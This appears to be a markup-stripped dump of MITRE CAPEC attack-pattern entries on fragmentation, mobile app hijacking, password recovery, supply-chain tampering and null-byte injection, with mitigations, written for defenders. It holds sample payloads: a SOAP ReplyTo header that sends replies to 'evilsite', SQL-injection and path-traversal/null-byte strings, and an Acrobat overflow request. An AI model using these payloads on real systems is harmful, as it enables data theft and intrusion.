Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can't be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don't match drop the SOAP packet at the web service layer.
1000
Attack Pattern
ChildOf
130
SOAP Array Attack
http://www.ws-attacks.org/index.php/Soap_Array_Attack
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. The attacker attempts to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered. This behavior defeats some IPS and firewall filters who typically check the FLAGS in the header of the first packet since dropping this packet prevents the following fragments from being processed and assembled. Another variation is overlapping fragments thus that an innocuous first segment passes the filter and the second segment overwrites the TCP header data with the true payload which is malicious in nature. The malicious payload manipulated properly may lead to a DoS due to resource consumption or kernel crash. Additionally the fragmentation could be used in conjunction with sending fragments at a rate slightly slower than the timeout to cause a DoS condition by forcing resources that assemble the packet to wait an inordinate amount of time to complete the task. The fragmentation identification numbers could also be duplicated very easily as there are only 16 bits in IPv4 so only 65536 packets are needed.
This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send TCP packets of arbitrary size with crafted data.
This attack may be mitigated by enforcing rules at the router following the guidance of RFC1858. The essential part of the guidance is creating the following rule "IF FO=1 and PROTOCOL=TCP then DROP PACKET" as this mitigated both tiny fragment and overlapping fragment attacks in IPv4. In IPv6 overlapping(RFC5722) additional steps may be required such as deep packet inspection. The delayed fragments may be mitigated by enforcing a timeout on the transmission to receive all packets by a certain time since the first packet is received. According to RFC2460 IPv6 implementations should enforce a rule to discard all fragments if the fragments are not ALL received within 60 seconds of the FIRST arriving fragment.
1000
Attack Pattern
ChildOf
130
Security Considerations - IP Fragment Filtering
https://www.rfc-editor.org/rfc/rfc1858.txt
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker may execute a UDP Fragmentation attack against a target server in an attempt to consume resources such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.
This type of an attack requires the attacker to be able to generate fragmented IP traffic containing crafted data.
This attack may be mitigated by changing default cache sizes to be larger at the OS level. Additionally rules can be enforced to prune the cache with shorter timeouts for packet reassembly as the cache nears capacity.
1000
Attack Pattern
ChildOf
130
Yossi Gilad
Amir Herzberg
Fragmentation Considered Vulnerable
2012
http://u.cs.biu.ac.il/~herzbea/security/12-03%20fragmentation.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.
This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send arbitrary sized ICMP packets to the target.
This attack may be mitigated through egress filtering based on ICMP payload so a network is a "good neighbor" to other networks. Bad IP implementations become patched, so using the proper version of a browser or OS is recommended.
1000
Attack Pattern
ChildOf
130
ICMP Attacks Illustrated
http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface.
This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device).
To mitigate this type of an attack, an application that may display sensitive information should clear the screen contents before a screenshot is taken. This can be accomplished by setting the key window's hidden property to YES. This code to hide the contents should be placed in both the applicationWillResignActive() and applicationDidEnterBackground() methods.
1000
Attack Pattern
ChildOf
116
Jonathan Zdziarksi
Hacking and Securing iOS Applications
Chapter 11 : Page 285 : Application Screenshots
First Edition
O'Reilly Media, Inc.
2012
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary, through a previously installed malicious application, intercepts messages from a trusted Android-based application in an attempt to achieve a variety of different objectives including denial of service, information disclosure, and data injection. An implicit intent sent from a trusted application can be received by any application that has declared an appropriate intent filter. If the intent is not protected by a permission that the malicious application lacks, then the attacker can gain access to the data contained within the intent. Further, the intent can be either blocked from reaching the intended destination, or modified and potentially forwarded along.
An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application is used to intercept implicit intents.
To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication.
1000
Attack Pattern
ChildOf
117
Erika Chin
Adrienne Porter Felt
Kate Greenwood
David Wagner
Analyzing Inter-Application Communication in Android
3.1 Unauthorized Intent Receipt
International Conference on Mobile Systems, Applications, and Services (MobiSys)
2011
http://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.
System must use weak authentication mechanisms for administrative functions.
Very High
Medium
Injection
Protocol Manipulation
An adversary identifies a vulnerable CCITT-5 phone line, and sends a combination tone to the switch in order to request administrative access. Based on tone and timing parameters the request is verified for access to the switch. Once the adversary has gained control of the switch launching calls, routing calls, and a whole host of opportunities are available.
Low
Given a vulnerable phone system, the attackers' technical vector relies on attacks that are well documented in cracker 'zines and have been around for decades.
CCITT-5 or other vulnerable lines, with the ability to send tones such as combined 2,400 Hz and 2,600 Hz tones to the switch
Implementation: Upgrade phone lines. Note this may be prohibitively expensive
Use strong access control such as two factor access control for administrative access to the switch
Availability
DoS: resource consumption (other)
Denial of Service
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Payload delivered through standard communication protocols.
Command(s) executed directly on host
Client machine and client network
Enables calls to be rerouted.
264
Targeted
1000
Attack Pattern
ChildOf
220
Penetration
Low
Medium
Medium
Other
Other
Other
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure. Most of them use only one security question . For instance, mother's maiden name tends to be a fairly popular one. Unfortunately in many cases this information is not very hard to find, especially if the attacker knows the legitimate user.
These generic security questions are also re-used across many applications, thus making them even more insecure. An attacker could for instance overhear a coworker talking to a bank representative at the work place and supplying their mother's maiden name for verification purposes. An attacker can then try to log in into one of the victim's accounts, click on "forgot password" and there is a good chance that the security question there will be to provide mother's maiden name.
A weak password recovery scheme totally undermines the effectiveness of a strong password scheme.
Understand the password recovery mechanism and how it works.
Find a weakness in the password recovery mechanism and exploit it. For instance, a weakness may be that a standard single security question is used with an easy to determine answer.
The system allows users to recover their passwords and gain access back into the system.
Password recovery mechanism has been designed or implemented insecurely.
Password recovery mechanism relies only on something the user knows and not something the user has.
No third party intervention is required to use the password recovery mechanism.
High
Medium
Brute Force
API Abuse
Injection
An attacker clicks on the "forgot password" and is presented with a single security question. The question is regarding the name of the first dog of the user. The system does not limit the number of attempts to provide the dog's name. An attacker goes through a list of 100 most popular dog names and finds the right name, thus getting the ability to reset the password and access the system.
phpBanner Exchange is a PHP script (using the mySQL database) that facilitates the running of a banner exchange without extensive knowledge of PHP or mySQL.
A SQL injection was discovered in the password recovery module of the system that allows recovering an arbitrary user's password and taking over his account. The problem is due to faulty input sanitization in the phpBannerExchange, specifically the e-mail address of the user which is requested by the password recovery module.
The e-mail address requested by the password recovery module on the resetpw.php page. That e-mail address is validated with the following regular expression:
if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*
(\.[a-z]{2,3})$", $email)){
A bug in the implementation of eregi() allows to pass additional character using a null byte "\0". Since eregi() is implemented in C, the variable $email is treated as a zero-terminated string. All characters following the Null Byte will not be recognized by the regular expression. So an e-mail address can be provided that includes the special character " ' " to break the SQL query below (and it will not be rejected by the regular expression because of the null byte trick). So a SQL injection becomes possible:
$get_info=mysql_query("select * from banneruser where
email='$email' ");
This query will return a non-zero result set even though the email supplied (attacker's email) is not in the database.
Then a new password for the user is generated and sent to the $email address, an e-mail address controlled by the attacker. An attacker can then log in into the system.
CVE-2006-3013
Low
Brute force attack
Medium
Social engineering and more sophisticated technical attacks.
For a brute force attack one would need a machine with sufficient CPU, RAM and HD.
Trial and error (brute force).
Social Engineering.
Many incorrect attempts to answer the security question.
Use multiple security questions (e.g. have three and make the user answer two of them correctly). Let the user select their own security questions or provide them with choices of questions that are not generic.
E-mail the temporary password to the registered e-mail address of the user rather than letting the user reset the password online.
Ensure that your password recovery functionality is not vulnerable to an injection style attack.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
522
Targeted
640
Targeted
718
Targeted
1000
Attack Pattern
ChildOf
212
Penetration
High
High
Low
All
All
All
All
Advisory: Unauthorized password recovery in phpBannerExchange
RedTeam Pentesting GmbH
2006
http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.
An adversary must be able install a purpose built malicious application onto the device and convince the user to execute it. The malicious application is designed to target a specific web application and is used to load the target web pages via the WebView component. For example, an adversary may develop an application that interacts with Facebook via WebView and adds a new feature that a user desires. The user would install this 3rd party app instead of the Facebook app.
The only known mitigation to this type of attack is to keep the malicious application off the system. There is nothing that can be done to the target application to protect itself from a malicious application that has been installed and executed.
1000
Attack Pattern
ChildOf
253
Tongbo Luo
Hao Hao
Wenliang Du
Yifei Wang
Heng Yin
Attacks on WebView in the Android System
Annual Computer Security Applications Conference (ACSAC)
2011
http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary, through a previously installed malicious application, intercepts an implicit intent sent to launch a trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and convince the user to enter sensitive data as if they were interacting with the trusted activity.
To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication.
1000
Attack Pattern
ChildOf
499
1000
Attack Pattern
ChildOf
173
Erika Chin
Adrienne Porter Felt
Kate Greenwood
David Wagner
Analyzing Inter-Application Communication in Android
3.1.2 Activity Hijacking
International Conference on Mobile Systems, Applications, and Services (MobiSys)
2011
http://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component blindly trusts the intent's action, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact.
An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application will be used to issue spoofed intents.
To limit one's exposure to this type of attack, developers should avoid exporting components unless the component is specifically designed to handle requests from untrusted applications. Developers should be aware that declaring an intent filter will automatically export the component, exposing it to public access. Critical, state-changing actions should not be placed in exported components. If a single component handles both inter- and intra-application requests, the developer should consider dividing that component into separate components. If a component must be exported (e.g., to receive system broadcasts), then the component should dynamically check the caller's identity prior to performing any operations. Requiring Signature or SignatureOrSystem permissions is an effective way of limiting a component's exposure to a set of trusted applications. Finally, the return values of exported components can also leak private data, so developers should check the caller's identity prior to returning sensitive values.
1000
Attack Pattern
ChildOf
148
Erika Chin
Adrienne Porter Felt
Kate Greenwood
David Wagner
Analyzing Inter-Application Communication in Android
International Conference on Mobile Systems, Applications, and Services (MobiSys)
2011
http://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView's addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.
This type of an attack requires the adversary to convince the user to load the malicious web page inside the target application. Once loaded, the malicious web page will have the same permissions as the target application and will have access to all registered interfaces. Both the permission and the interface must be in place for the functionality to be exposed.
To mitigate this type of an attack, an application should limit permissions to only those required and should verify the origin of all web content it loads.
1000
Attack Pattern
ChildOf
122
Tongbo Luo
Hao Hao
Wenliang Du
Yifei Wang
Heng Yin
Attacks on WebView in the Android System
Annual Computer Security Applications Conference (ACSAC)
2011
http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary, through a previously installed malicious application, monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.
The only known mitigation to this attack is to avoid installing the malicious application on the device. However, the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help.
1000
Attack Pattern
ChildOf
173
Adrienne Porter Felt
David Wagner
Phishing on Mobile Devices
4.1.2 Man-In-The-Middle
University of California, Berkeley
2011
http://www.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary, through a previously installed malicious application, registers for a URL scheme intended for a target application that has not been installed. Thereafter, messages intended for the target application are handled by the malicious application. Upon receiving a message, the malicious application displays a screen that mimics the target application, thereby convincing the user to enter sensitive information. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user as they think that they are interacting with the intended target application.
The only known mitigation to this attack is to avoid installing the malicious application on the device. Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible.
1000
Attack Pattern
ChildOf
173
Adrienne Porter Felt
David Wagner
Phishing on Mobile Devices
4.1.2 Man-In-The-Middle
University of California, Berkeley
2011
http://www.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary, through a previously installed malicious application, displays an interface that misleads the user and convinces them to tap in an attacker desired location. This is often accomplished by overlaying one screen on top of another while giving the appearance of a single interface. There are two main techniques used to accomplish this. The first is to leverage transparent properties that allow taps on the screen to pass through the visible application to an application running in the background. The second is to strategically place a small object (e.g., a button or text field) on top of the visible screen and make it appear to be a part of the underlying application. In both cases, the user is convinced to tap on the screen but does not realize the application that they are interacting with.
This pattern of attack requires the ability to execute a malicious application on the user's device. This malicious application is used to present the interface to the user and make the attack possible.
Low
Low
1000
Attack Pattern
ChildOf
173
Marcus Niemietz
Jorg Schwenk
UI Redressing Attacks on Android Devices
4. New Browserless Attacks
Horst Gortz Institute for IT-Security
2012
https://media.blackhat.com/ad-12/Niemietz/bh-ad-12-androidmarcus_niemietz-WP.pdf
David Richardson
Look-10-007 - Tapjacking
Lookout Mobile Security
2010
https://blog.lookout.com/look-10-007-tapjacking/
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary gains physical access to a system or device through theft of the item. Possession of a system or device enables a number of unique attacks to be executed and often provides the adversary with an extended timeframe for which to perform an attack. Most protections put in place to secure sensitive information can be defeated when an adversary has physical access and enough time.
This type of attack requires the existence of a physical target that an adversary believes hosts something of value.
To mitigate this type of attack, physical security techniques such as locks doors, alarms, and monitoring of targets should be implemented.
CAPEC Content Team
The MITRE Corporation
2014-06-23
SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata (to effect a denial of service), and delete information about service provider interfaces.
WS-Addressing is used to virtualize services, provide return addresses and other routing information, however, unless the WS-Addressing headers are protected they are vulnerable to rewriting. The attacker that can rewrite WS-addressing information gains the ability to route service requesters to any service providers, and the ability to route service provider response to any service.
Content in a registry is deployed by the service provider. The registry in an SOA or Web Services system can be accessed by the service requester via UDDI or other protocol. The basic flow for the attacker consists of either altering the data at rest in the registry or uploading malicious content by spoofing a service provider. The service requester is then redirected to send its requests and/or responses to services the attacker controls.
The attacker must be able to write to resources or redirect access to the service registry.
Very High
High
Modification of Resources
Injection
Protocol Manipulation
WS-Addressing provides location and metadata about the service endpoints. An extremely hard to detect attack is an attacker who updates the WS-Addressing header, leaves the standard service request and service provider addressing and header information intact, but adds an additional WS-Addressing Replyto header. In this case the attacker is able to send a copy (like a cc in mail) of every result the service provider generates. So every query to the bank account service, would generate a reply message of the transaction status to both the authorized service requester and an attacker service. This would be extremely hard to detect at runtime.
<S:Header>
<wsa:MessageID>
http://example.com/Message
</wsa:MessageID>
<wsa:ReplyTo>
<wsa:Address>http://valid.example/validClient</wsa:Address>
</wsa:ReplyTo>
<wsa:ReplyTo>
<wsa:Address>http://evilsite/evilClient</wsa:Address>
</wsa:ReplyTo>
<wsa:FaultTo>
<wsa:Address>http://validfaults.example/ErrorHandler</wsa:Address>
</wsa:FaultTo>
</S:Header>
In this example "evilsite" is an additional reply to address with full access to all the messages that the authorized (validClient) has access to. Since this is registered with ReplyTo header it will not generate a Soap fault.
Low
To identify and execute against an over-privileged system interface
Capability to directly or indirectly modify registry resources
Design: Enforce principle of least privilege
Design: Harden registry server and file access permissions
Implementation: Implement communications to and from the registry using secure protocols
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Read application data
Integrity
Modify application data
Payload delivered through standard communication protocols, such as UDDI or WS-Addressing.
Command(s) executed directly on service requester, in the case of redirect, or on the service provider, in the case of the additional replyto attack.
Client machine and client network
Enables attacker to execute server side code with any commands that the program owner has privileges to.
285
Targeted
74
Targeted
693
Targeted
1000
Attack Pattern
ChildOf
203
Exploitation
High
High
High
SOA
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud based application) by leveraging the persistent and implicit trust placed on a trusted user's session. This attack is executed after a trusted user is authenticated into a cloud service, "piggy-backing" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user's privilege level.
An adversary must be able install a purpose built malicious application onto the trusted user's system and convince the user to execute it while authenticated to the SaaS application.
Medium
High
Cloud services are often accessed from unmanaged devices over untrusted networks. The likelihood of an adversary having a presence on these unmanaged devices is high. Several instances of this style of attack have been found.
Medium
This attack pattern often requires the technical ability to modify a malicious software package (e.g. Zeus) to spider a targeted site and a way to trick a user into a malicious software download.
To limit one's exposure to this type of attack, tunnel communications through a secure proxy service.
Detection of this type of attack can be done through heuristic analysis of behavioral anomalies (a la credit card fraud detection) which can be used to identify inhuman behavioral patterns. (e.g., spidering)
346
Targeted
1000
Attack Pattern
ChildOf
21
Ami Luttwak
A new Zeus variant targeting Salesforce.com – Research and Analysis
Adallom, Inc.
2014-02-19
http://www.adallom.com/blog/a-new-zeus-variant-targeting-salesforce-com-accounts-research-and-analysis/
SaaS/Cloud applications are often accessed from unmanaged systems and devices, over untrusted networks that are outside corporate IT control. The likelihood of a cloud service being accessed by a trusted user though an untrusted device is high. Several instances of this style of attack have been found.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses common delivery mechanisms such as email attachments or removable media to infiltrate the IDE (Integrated Development Environment) of a victim manufacturer with the intent of implanting malware allowing for attack control of the victim IDE environment. The attack then uses this access to exfiltrate sensitive data or information, manipulate said data or information, and conceal these actions. This will allow and aid the attack to meet the goal of future compromise of a recipient of the victim's manufactured product further down in the supply chain.
The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).
The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.
The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
The attacker, knowing the victim runs email on a system adjacent to the IDE system, sends a phishing email with a malicious attachment to the victim. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent IDE system from the victim's workstation. The attacker is then able to exfiltrate sensitive data about the software being developed on the IDE system.
Medium
Intelligence about the manufacturer's operating environment and infrastructure.
High
Ability to develop, deploy, and maintain a stealth malicious backdoor program remotely in what is essentially a hostile environment.
High
Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)
1000
Attack Pattern
ChildOf
438
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker with access to system components during allocated baseline development can substitute a maliciously altered hardware component for a baseline component in the during the product development and research phase. This can lead to adjustments and calibrations being made in the product, so that when the final product with the proper components is deployed, it will not perform as designed and be advantageous to the attacker.
The attacker will need either physical access or be able to supply malicious hardware components to the product development facility.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
An attacker supplies the product development facility of a network security device with a hardware component that is used to simulate large volumes of network traffic. The device claims in logs, stats, and via the display panel to be pumping out very large quanities of network traffic, when it is in fact putting out very low volumes. The developed product is adjusted and configured to handle the what it believes to be a heavy network load, but when deployed at the victim site the large volumes of network traffic are dropped instead of being processed by the network security device. This allows the attacker an advantage when attacking the victim in that the attacker's presence may not be detected by the device.
Medium
Intelligence data on victim's purchasing habits.
High
Resources to maliciously construct/alter hardware components used for testing by the supplier.
High
Resources to physically infiltrate supplier.
1000
Attack Pattern
ChildOf
438
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker with access to a manufacturer's documentation, which include descriptions of advanced technology and/or specific components' criticality, alters the documents to circumvent dial-down functionality requirements. This alteration would change the interpretation of implementation and manufacturing techniques, allowing for advanced technologies to remain in place even though these technologies might be restricted to certain customers, such as nations on the terrorist watch list, giving the attacker on the receiving end of a shipped product access to an advanced technology that might otherwise be restricted.
Advanced knowledge of internal software and hardware components within manufacturer's development environment.
Access to the manufacturer's documentation.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
A product for manufacture exists that contains advanced cryptographic capabilities, including algorithms that are restricted from being shipped to some nations. An attacker from one of the restricted nations alters the documentation to ensure that when the product is manufactured for shipment to a restricted nation, the software compilation steps that normally would prevent the advanced cryptographic capabilities from being included are actually included. When the product is shipped to the attacker's home country, the attacker is able to retrieve and/or use the advanced cryptographic capabilities.
High
Ability to read, interpret, and subsequently alter manufacturer's documentation to prevent dial-down capabilities.
High
Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation.
1000
Attack Pattern
ChildOf
438
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker with access to a manufacturer's documentation alters the descriptions of system capabilities with the intent of causing errors in derived system requirements, impacting the overall effectiveness and capability of the system, allowing an attacker to take advantage of the introduced system capability flaw once the system is deployed.
Advanced knowledge of software and hardware capabilities of a manufacturer's product.
Access to the manufacturer's documentation.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
A security subsystem involving encryption is a part of a product, but due to the demands of this subsystem during operation, the subsystem only runs when a specific amount of memory and processing is available. An attacker alters the descriptions of the system capabilities so that when deployed with the minimal requirements at the victim location, the encryption subsystem is never operational, leaving the system in a weakened security state.
High
Ability to read, interpret, and subsequently alter manufacturer's documentation to misrepresent system capabilities.
High
Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation.
1000
Attack Pattern
ChildOf
438
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker with access to a manufacturer's documentation containing requirements allocation and software design processes maliciously alters the documentation in order to cause errors in system design. This allows the attacker to take advantage of a weakness in a deployed system of the manufacturer for malicious purposes.
Advanced knowledge of software capabilities of a manufacturer's product.
Access to the manufacturer's documentation.
High
Low
The nature of these type of attacks involve a coordinated effort between well-funded multiple attackers, and sometimes require physical access to successfully complete an attack. As a result these types of attacks are not launched on a large scale against any potential victim, but are typically highly targeted against victims who are often targeted and may have rather sophisicated cyber defenses already in place.
During operation, a firewall will restart various subsystems to reload and implement new rules as added by the user. An attacker alters the software design dependencies in the manufacturer's documentation so that under certain predictable conditions the reload will fail to load in rules resulting in a "fail open" state. Once deployed at a victim site, this will allow the attacker to bypass the victim's firewall.
High
Ability to read, interpret, and subsequently alter manufacturer's documentation to cause errors in system design.
High
Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation.
1000
Attack Pattern
ChildOf
438
John F. Miller
Supply Chain Attack Framework and Attack Patterns
The MITRE Corporation
2013
http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker embeds one or more null bytes in input to the target software. This attack relies on the usage of a null-valued byte as a string terminator in many environments. The goal is for certain components of the target software to stop processing the input when it encounters the null byte(s).
Identify a place in the program where user input may be used to escalate privileges by for instance accessing unauthorized file system resources through directory browsing.
An attacker realizes that there is a postfix data that gets in the way of getting to the desired resources
An attacker then ads a postfix NULL terminator to the supplied input in order to "swallow" the postfixed data when the insertion is taking place. With the postfix data that got in the way of the attack gone, the doors are opened for accessing the desired resources.
The program does not properly handle postfix NULL terminators
High
High
Injection
Modification of Resources
API Abuse
Directory Browsing
Assume a Web application allows a user to access a set of reports. The path to the reports directory may be something like web/username/reports. If the username is supplied via a hidden field, an attacker could insert a bogus username such as ../../../../../WINDOWS. If the attacker needs to remove the trailing string /reports, then he can simply insert enough characters so the string is truncated. Alternatively the attacker might apply the postfix NULL character (%00) to determine whether this terminates the string.
Different forms of NULL to think about include
PATH%00
PATH[0x00]
PATH[alternate representation of NULL character]
<script></script>%00
Exploitation of a buffer overflow vulnerability in the ActiveX component packaged with Adobe Systems Inc.'s Acrobat/Acrobat Reader allows remote attackers to execute arbitrary code.
The problem specifically exists upon retrieving a link of the following form:
GET /any_existing_dir/any_existing_pdf.pdf%00[long string] HTTP/1.1
Where [long string] is a malicious crafted long string containing acceptable URI characters. The request must be made to a web server that truncates the request at the null byte (%00), otherwise an invalid file name is specified and a "file not found" page will be returned. Example web servers that truncate the requested URI include Microsoft IIS and Netscape Enterprise. Though the requested URI is truncated for the purposes of locating the file the long string is still passed to the Adobe ActiveX component responsible for rendering the page. This in turn triggers a buffer overflow within RTLHeapFree() allowing for an attacker to overwrite an arbitrary word in memory. The responsible instructions from RTLHeapFree() are shown here:
0x77F83AE5 MOV EAX,[EDI+8]
0x77F83AE8 MOV ECX,[EDI+C]
...
0x77F83AED MOV [ECX],EAX
The register EDI contains a pointer to a user-supplied string. The attacker therefore has control over both the ECX and EAX registers used in the shown MOV instruction.
Successful exploitation allows remote attackers to utilize the arbitrary word overwrite to redirect the flow of control and eventually take control of the affected system. Code execution will occur under the context of the user that instantiated the vulnerable version of Adobe Acrobat.
An attacker does not need to establish a malicious web site as exploitation can occur by adding malicious content to the end of any embedded link and referencing any Microsoft IIS or Netscape Enterprise web server. Clicking on a direct malicious link is also not required as it may be embedded within an IMAGE tag, an IFRAME or an auto-loading script.
